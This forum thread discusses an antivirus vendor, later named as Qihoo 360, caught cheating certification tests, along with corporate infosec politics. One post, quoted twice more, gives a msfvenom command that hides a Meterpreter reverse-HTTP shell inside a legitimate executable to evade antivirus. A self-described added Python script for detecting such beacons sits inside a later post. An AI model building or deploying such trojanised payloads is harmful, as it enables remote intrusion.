
Hey Mr AV scan... what's that you're hiding???

Comments

  • Closed Accounts Posts: 1,322 ✭✭✭dbit


    Kaspersky, FireEye, who done it?


  • Registered Users, Registered Users 2 Posts: 1,835 ✭✭✭BoB_BoT


    Can't imagine it being Kaspersky, too much to lose caught at that. Would seriously tarnish their reputation.

    Saying that, it would tarnish anyone's reputation, I'm also intrigued who it is.


  • Closed Accounts Posts: 1,322 ✭✭✭dbit


    BoB_BoT wrote: »
    Can't imagine it being Kaspersky, too much to lose caught at that. Would seriously tarnish their reputation.

    Saying that, it would tarnish anyone's reputation, I'm also intrigued who it is.

    I've signed up to the Facebook page, or liked it, lols. Rubbing hands in anticipation.


  • Closed Accounts Posts: 1,322 ✭✭✭dbit


    It's curtains for whoever has breached this level of trust, no doubt.


  • Closed Accounts Posts: 824 ✭✭✭Kinet1c


    dbit wrote: »
    It's curtains for whoever has breached this level of trust, no doubt.

    It's not. Average Joe that buys AV will still have Norton/McAfee pushed on them by their PC salesperson, and corporations will buy from whoever gives them the best deal, both under and over the table.


  • Closed Accounts Posts: 1,322 ✭✭✭dbit


    I would not be so sure in the corporate world - infosec staff will have this hot on the lips and banish the product if in use. If it was me, I know I would.


  • Closed Accounts Posts: 824 ✭✭✭Kinet1c


    dbit wrote: »
    I would not be so sure in the corporate world - infosec staff will have this hot on the lips and banish the product if in use. If it was me, I know I would.

    Infosec often have their hands tied. I worked for a firm with 50k people, everything going well with a particular vendor, only for some bigwig to sign them up to a deal with a lesser product. Infosec had to eat it and deal with all the bugs/issues it caused with the very customised Windows build.


  • Closed Accounts Posts: 1,322 ✭✭✭dbit


    Kinet1c wrote: »
    Infosec often have their hands tied. I worked for a firm with 50k people, everything going well with a particular vendor, only for some bigwig to sign them up to a deal with a lesser product. Infosec had to eat it and deal with all the bugs/issues it caused with the very customised Windows build.

    Totally agree. However, buggy software and staff struggling never seems to peter up the chain, possibly due to some backhanders, great deals, offers they cannot refuse and so on. But blatant lying and duping certification tests would see me leaving a firm if they didn't refuse to get rid of the product. (Personally speaking, I cannot speak for the masses.)

    It's the worst possible thing an AV suite can do, to modify its download package after certification was done. Falsifying results and changing the end product as per the test criteria.


  • Registered Users, Registered Users 2 Posts: 5,112 ✭✭✭Blowfish


    dbit wrote: »
    Totally agree. However, buggy software and staff struggling never seems to peter up the chain, possibly due to some backhanders, great deals, offers they cannot refuse and so on. But blatant lying and duping certification tests would see me leaving a firm if they didn't refuse to get rid of the product. (Personally speaking, I cannot speak for the masses.)

    It's the worst possible thing an AV suite can do, to modify its download package after certification was done. Falsifying results and changing the end product as per the test criteria.
    I wouldn't rate that as anywhere near the worst thing an AV suite can do. I mean, let's be realistic here, most AV (yes, including the one you work for) is pretty terrible at its job and can be bypassed by anyone half decent given 2 minutes with Metasploit, never mind the fact that a fair few have been shown to have vulnerabilities of their own.

    Leaving a company over them refusing to change vendor seems a fair bit OTT given the product just isn't that effective anyway.


  • Closed Accounts Posts: 1,322 ✭✭✭dbit


    Well, my area is in the cloud sector and Metasploit doesn't even come close to undoing the hardening we employ on a cloud platform solution. Yes, if you study any one product long enough then you can engineer a way to defunct the family in use; it's certainly not going to only require a 2 min time-frame, that's not very realistic in my eyes.

    If I am top-level admin and I employ a solution and pay for it to do X, Y and Z and it skips X then I **** it out, simple as that.


  • Registered Users, Registered Users 2 Posts: 5,112 ✭✭✭Blowfish


    dbit wrote: »
    Well, my area is in the cloud sector and Metasploit doesn't even come close to undoing the hardening we employ on a cloud platform solution. Yes, if you study any one product long enough then you can engineer a way to defunct the family in use; it's certainly not going to only require a 2 min time-frame, that's not very realistic in my eyes.
    Here's a one-liner from Metasploit that pops a reverse shell and bypasses around 50% of AV:
    msfvenom -p windows/meterpreter/reverse_http -f exe LHOST=<ip> LPORT=80 -x /root/Desktop/MalwareTest/kix32.exe >> PerfectlyInnocentFile.exe
    
    If I could be bothered encoding/obfuscating it or using a less obvious payload, it'd be higher.


  • Closed Accounts Posts: 1,322 ✭✭✭dbit


    Blowfish wrote: »
    Here's a one-liner from Metasploit that pops a reverse shell and bypasses around 50% of AV:
    msfvenom -p windows/meterpreter/reverse_http -f exe LHOST=<ip> LPORT=80 -x /root/Desktop/MalwareTest/kix32.exe >> PerfectlyInnocentFile.exe
    
    If I could be bothered encoding/obfuscating it or using a less obvious payload, it'd be higher.

    Ammmmm, how exactly does that attack an agentless protected stack with a virtual appliance? I fail to see how the hardening has been downgraded in kernel on a remote stack that is not even installed upon the guest?? Your payload would be nailed by our intrusion prevention rules on first run.

    I take it that's only for a native client onboard, as when I run it in Kali MS it does nothing to the protection. Try targeting the Deep Security solution and let me know how quickly you nerf the protection.

    Yes, it's most likely a win for AV-installed guests, but cloud and the sector are coming up with more advanced ways to protect the entire solution. Deep Sec is written in close proximity to the kernels used in VMware and is designed and written to go hand in hand with the VMkernel, NSX and vCNS stack.


    That MS script/command doesn't prove to me that you have broken the product, defuncted the agentless, penetrated the IPS rules or even rendered the guest unprotected.


  • Closed Accounts Posts: 1,322 ✭✭✭dbit


    As per the script, it looks to me the guest would already be in a vulnerable state:
    msfvenom -p windows/meterpreter/reverse_http -f exe LHOST=<ip> LPORT=80 -x /root/Desktop/MalwareTest/kix32.exe >> PerfectlyInnocentFile.exe



    The remote target has to be listening on port 80??? Why would anyone let the cloud VMs listen on port 80 without some form of firewalling? Not a real test for cloud, I'm thinking.

    It's also calling LHOST? How is that going to target a remote IP? To run that you would have to be on the guest itself, and if that's the case there is a bigger-picture issue in play.


  • Registered Users, Registered Users 2 Posts: 5,112 ✭✭✭Blowfish


    I think you need to take a step back a bit. AV-Comparatives is primarily used for comparing consumer/client-level AV, i.e. how good are they at picking up on malicious executable code. My example just showed that this is something AV isn't particularly good at if in a single command I can create a malicious exe that over half of them miss.
    dbit wrote: »
    The remote target has to be listening on port 80??? Why would anyone let the cloud VMs listen on port 80 without some form of firewalling? Not a real test for cloud, I'm thinking.
    It's a reverse shell, so it creates an outbound connection on port 80. It was used out of simplicity.
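    As an added defender's-side example (not code from this thread, nor from Metasploit or any vendor named here), the outbound connection described above is also what gives a reverse-HTTP payload away in egress logs: the compromised host has to dial out to its handler again and again, so one source shows a run of outbound port-80 connections to a single destination at a near-constant interval, something a browser or a normal update check rarely does. The Python below parses constructed firewall log lines and flags such pairs by the regularity of the gaps between connections. The log format, addresses and thresholds are all assumptions made for this example and will need tuning per environment.

```python
"""Flag hosts whose outbound port-80 connections recur like a beacon.

Added example; the log format, addresses and thresholds are constructed
assumptions, not taken from any real firewall product.
"""
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed egress-firewall log lines: 10.0.1.12 dials out to one
# destination every 5 seconds; 10.0.1.20 browses at irregular intervals.
SAMPLE_LOG = """\
2015-05-01T10:00:00 ALLOW 10.0.1.12:49152 -> 203.0.113.7:80 proto=tcp
2015-05-01T10:00:05 ALLOW 10.0.1.12:49153 -> 203.0.113.7:80 proto=tcp
2015-05-01T10:00:10 ALLOW 10.0.1.12:49154 -> 203.0.113.7:80 proto=tcp
2015-05-01T10:00:15 ALLOW 10.0.1.12:49155 -> 203.0.113.7:80 proto=tcp
2015-05-01T10:00:20 ALLOW 10.0.1.12:49156 -> 203.0.113.7:80 proto=tcp
2015-05-01T10:00:25 ALLOW 10.0.1.12:49157 -> 203.0.113.7:80 proto=tcp
2015-05-01T10:00:01 ALLOW 10.0.1.20:50000 -> 198.51.100.9:80 proto=tcp
2015-05-01T10:03:40 ALLOW 10.0.1.20:50001 -> 198.51.100.9:80 proto=tcp
2015-05-01T10:04:02 ALLOW 10.0.1.20:50002 -> 198.51.100.22:80 proto=tcp
2015-05-01T10:09:15 ALLOW 10.0.1.20:50003 -> 198.51.100.9:443 proto=tcp
2015-05-01T10:11:00 ALLOW 10.0.1.20:50004 -> 198.51.100.9:80 proto=tcp
"""

# Assumed line layout: "<iso-timestamp> <action> <src>:<sport> -> <dst>:<dport> proto=<p>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<action>\S+) (?P<src>[\d.]+):(?P<sport>\d+) -> "
    r"(?P<dst>[\d.]+):(?P<dport>\d+) proto=(?P<proto>\w+)$"
)


def parse_log(text):
    """Parse log lines into dicts; lines that do not match are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        rec = m.groupdict()
        rec["ts"] = datetime.fromisoformat(rec["ts"])
        rec["dport"] = int(rec["dport"])
        records.append(rec)
    return records


def find_beacons(records, port=80, min_connections=5, max_cv=0.2,
                 min_interval=1.0, max_interval=3600.0):
    """Return (src, dst) pairs whose connections on `port` recur regularly.

    Regularity is the coefficient of variation (stdev / mean) of the gaps
    between successive connections; a small value means a steady cadence.
    Both allowed and denied connections count: a beacon that the firewall
    keeps blocking is just as worth a look as one that gets through.
    """
    by_pair = defaultdict(list)
    for rec in records:
        if rec["dport"] == port:
            by_pair[(rec["src"], rec["dst"])].append(rec["ts"])

    findings = []
    for (src, dst), stamps in by_pair.items():
        if len(stamps) < min_connections:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        avg = mean(gaps)
        if not (min_interval <= avg <= max_interval):
            continue  # too fast to be a beacon, or too slow to judge
        cv = pstdev(gaps) / avg
        if cv <= max_cv:
            findings.append({"src": src, "dst": dst, "dport": port,
                             "count": len(stamps), "mean_interval": avg,
                             "cv": cv})
    return findings


if __name__ == "__main__":
    for f in find_beacons(parse_log(SAMPLE_LOG)):
        print(f"{f['src']} -> {f['dst']}:{f['dport']}: {f['count']} connections, "
              f"every ~{f['mean_interval']:.1f}s (cv={f['cv']:.2f})")
```

    On the constructed input only 10.0.1.12 -> 203.0.113.7 is flagged. A hit is a triage lead, not a verdict: update agents and monitoring tools beacon too, so the next step is checking which process owns the connections and whether the destination is known, which is also why logs that only go back two days, as mentioned later in this thread, make this kind of check much weaker.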


  • Closed Accounts Posts: 1,322 ✭✭✭dbit


    Blowfish wrote: »
    I think you need to take a step back a bit. AV-Comparatives is primarily used for comparing consumer/client-level AV, i.e. how good are they at picking up on malicious executable code. My example just showed that this is something AV isn't particularly good at if in a single command I can create a malicious exe that over half of them miss.
    It's a reverse shell, so it creates an outbound connection on port 80. It was used out of simplicity.

    Well, I did state my sector is cloud and thus I was banging on in the area in which I specialize. We don't opt for the standard AV solution in cloud as that requires more when global banks are firing out VMs at a ferocious rate and need quick stand-up of baseline protection on a large scale. To attack this bitch you need to spend a hell of a lot longer than 2 mins.


  • Closed Accounts Posts: 1,322 ✭✭✭dbit


    Getting back on topic... The testing group have now collaborated with other testing houses, and had a conference call today. They are now joining forces to compare test results and ensure it's not a misfire.

    What I take from the previous posts is that there are some Irish admins who won't even bat an eye at this, and that is one of the biggest problems with infosec and admins in this country in particular. They won't even try to persuade the customer on the back of this news, as per the suggestion that they won't listen for whatever mundane reason. If we don't speak, they cannot hear.


  • Closed Accounts Posts: 18,966 ✭✭✭✭syklops


    Kinet1c wrote: »
    Infosec often have their hands tied. I worked for a firm with 50k people, everything going well with a particular vendor, only for some bigwig to sign them up to a deal with a lesser product. Infosec had to eat it and deal with all the bugs/issues it caused with the very customised Windows build.

    This times a thousand. I was responding to an incident and needed data from the AV. It was severely lacking. I asked IT why we picked this particular product. IT responded, "The COO made the decision". The COO was so clued up in technology that if you turned his mouse upside down, he would ring IT complaining it wasn't working. The wrong guy to select the AV product. In another organisation they had bought a web filter. Actually, a sales executive had bought it during a round of golf and they felt they should deploy it.

    The InfoSec team has the power to save the company the most money of all the teams in a company but they very rarely have any executive representation and so get ignored or shouted down all the time.


  • Closed Accounts Posts: 1,322 ✭✭✭dbit


    Hi again syklops, and as per our last discussion on the new EU regulations coming in the pipeline, referring to the "infosec officer": that role will no longer be able to be filled with that type of person (lollygagging golf-course chaser). They will be required to hold some form of security qualification that is in line with the operations and will be held accountable for the decisions made or not made by that firm.

    The infosec officer will be able to make the required decisions, and given they will still be hampered by backline management trying to go the "cheap route", they ultimately will be held accountable under new EU legislation. So that person can ask themselves: do I go cheap and face litigation down the road, or do I stand up and be counted for his or her defined role, for which they spent years training and thousands on...

    If the call was a personal one and up to me, I know what I would decide; again, any firm that didn't have my back, I would walk.


  • Closed Accounts Posts: 18,966 ✭✭✭✭syklops


    dbit wrote: »
    Hi again syklops, and as per our last discussion on the new EU regulations coming in the pipeline, referring to the "infosec officer": that role will no longer be able to be filled with that type of person (lollygagging golf-course chaser). They will be required to hold some form of security qualification that is in line with the operations and will be held accountable for the decisions made or not made by that firm.

    The infosec officer will be able to make the required decisions, and given they will still be hampered by backline management trying to go the "cheap route", they ultimately will be held accountable under new EU legislation. So that person can ask themselves: do I go cheap and face litigation down the road, or do I stand up and be counted for his or her defined role, for which they spent years training and thousands on...

    If the call was a personal one and up to me, I know what I would decide; again, any firm that didn't have my back, I would walk.

    That all looks great on paper. Over in Brussels MEPs like Nessa Childers and Brian Hayes are congratulating themselves for solving the infosec question.

    The reality is, the same clueless executives will make the decisions. "Will need a security qualification", means one of them will be sent on a 5 day bootcamp, or an intensive CISSP course. A few hundred G's will be assigned for security technology, so they buy next generation firewalls and top of the line IPS devices and neglect to get some talent in. Then they have an incident, and discover their top of the line kit wasn't configured properly. The firewalls were only logging the last 2 days and the IPS was in detection mode not blocking mode and no-one was looking at logs.

    The Data Protection Act came in in 1988 and was amended in 2003. Twelve years later we have a single data protection ombudsman with a staff of three and an office in Leitrim or somewhere. They recently gave the Data Protection Office 3 million, half of which they will spend on a Dublin office and new stationery. My point? This new law, assuming it gets passed, will be as toothless and inadequate as previous attempts.


  • Closed Accounts Posts: 1,322 ✭✭✭dbit


    syklops wrote: »
    That all looks great on paper. Over in Brussels MEPs like Nessa Childers and Brian Hayes are congratulating themselves for solving the infosec question.

    The reality is, the same clueless executives will make the decisions. "Will need a security qualification", means one of them will be sent on a 5 day bootcamp, or an intensive CISSP course. A few hundred G's will be assigned for security technology, so they buy next generation firewalls and top of the line IPS devices and neglect to get some talent in. Then they have an incident, and discover their top of the line kit wasn't configured properly. The firewalls were only logging the last 2 days and the IPS was in detection mode not blocking mode and no-one was looking at logs.

    The Data Protection Act came in in 1988 and was amended in 2003. Twelve years later we have a single data protection ombudsman with a staff of three and an office in Leitrim or somewhere. They recently gave the Data Protection Office 3 million, half of which they will spend on a Dublin office and new stationery. My point? This new law, assuming it gets passed, will be as toothless and inadequate as previous attempts.


    I hope not; the truth will be in the breaches for the 2015-2016 timeframe. We'll see if anyone goes down the tubes over the back-breaking penalties enforced by these new laws. I agree again with most of that, and I am hoping that this will take a U-turn and see real accountability take its place at the table. I can't think of any other way to instil the "fear of God" in companies who let infosec flail about like a broken arm on a deaf, dumb, mute skydiver.


  • Registered Users, Registered Users 2 Posts: 5,112 ✭✭✭Blowfish


    dbit wrote: »
    What I take from the previous posts is that there are some Irish admins who won't even bat an eye at this, and that is one of the biggest problems with infosec and admins in this country in particular. They won't even try to persuade the customer on the back of this news, as per the suggestion that they won't listen for whatever mundane reason. If we don't speak, they cannot hear.
    Honestly, for me it's not that this isn't an issue; in an ideal world it'd certainly factor in the decision of what vendor to go for.

    In the real world however, there are a myriad of other factors which can get in the way, some of which have been highlighted above. If there's one thing you learn from blue teaming it's to pick your battles and unfortunately for lots of people this battle (if applicable) would be one that would be a lot of effort for very little real world gain.


  • Closed Accounts Posts: 1,322 ✭✭✭dbit


    Personally, I think the directives are a scapegoat to be able to turn massive payouts back on the offending firm/company for data loss. Aggressive but effective is what I'm reading from all of it. Effectiveness will only start to be evident once convictions are delivered on the back of these laws. Industry grimaces and winces at those types of reports, and if mainstay and in the public eye, which again these directives are forcing, disclosure of breach within 24 hours, or else FINES.

    It's the nature of the beast. Now to try to scare companies into being top level, but with only 3 employees (no way for that to be proactive, only reactive) in IRL(/EU), then the inadequacies will only come to light once convictions and breaches have already occurred. Who are the beneficiaries of the payouts? The victims - surely not? Is it all just a hand-rubbing session and a new way for the EU to rip money out of the hands of badly deployed infosec houses???


  • Closed Accounts Posts: 824 ✭✭✭Kinet1c


    dbit wrote: »
    Getting back on topic... The testing group have now collaborated with other testing houses, and had a conference call today. They are now joining forces to compare test results and ensure it's not a misfire.

    Really should've done this before posting link bait to their web/facebook pages.


  • Closed Accounts Posts: 18,966 ✭✭✭✭syklops


    Kinet1c wrote: »
    Really should've done this before posting link bait to their web/facebook pages.

    Yeah. A Facebook page? Really?


  • Closed Accounts Posts: 1,322 ✭✭✭dbit


    syklops wrote: »
    Yeah. A Facebook page? Really?

    I thought the same thing, but hey, there ya go. See the first post on the webpage; they link you to it. It's public so it can be viewed without logging in, presuming you don't use Facebook.


  • Closed Accounts Posts: 1,322 ✭✭✭dbit


    Kinet1c wrote: »
    Really should've done this before posting link bait to their web/facebook pages.

    Agh sure, you know me, if they are wrong I'll prolly burn down all their houses and block their web page on every proxy I ever touch in future. lolz.

    A pestilence upon the wrongdoers who do not conform to the way things should be done.

    Great vengeance and furious anger and all.


  • Registered Users, Registered Users 2 Posts: 2,626 ✭✭✭timmywex


    And the results are in....

    Qihoo has been stripped of certification. A Chinese AV provider, I'm sure it's not the only dodgy practice they have going on :pac:


  • Closed Accounts Posts: 1,322 ✭✭✭dbit


    timmywex wrote: »
    And the results are in....

    Qihoo has been stripped of certification. A Chinese AV provider, I'm sure it's not the only dodgy practice they have going on :pac:

    WE HAAAAAVE A WIIIINNEEERRRR DING DING DING !!! lols.


  • Closed Accounts Posts: 1,322 ✭✭✭dbit


    And now the aftermath, where they explain why it happened...
    http://blog.360totalsecurity.com/en/qihoo-360-statement-regarding-cheating-in-lab-test/

